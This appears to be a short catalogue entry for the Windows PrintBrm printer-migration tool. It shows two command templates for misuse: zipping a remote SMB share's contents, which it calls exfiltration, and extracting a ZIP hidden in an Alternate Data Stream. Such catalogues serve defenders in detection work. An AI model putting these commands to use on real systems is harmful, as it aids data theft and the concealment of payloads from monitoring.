Printer Migration Command-Line Tool
Create a ZIP file from a folder in a remote drive
PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}
Exfiltrate the contents of a remote folder on a UNC share into a zip file
Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}
Decompress and extract a ZIP file stored on an alternate data stream to a new folder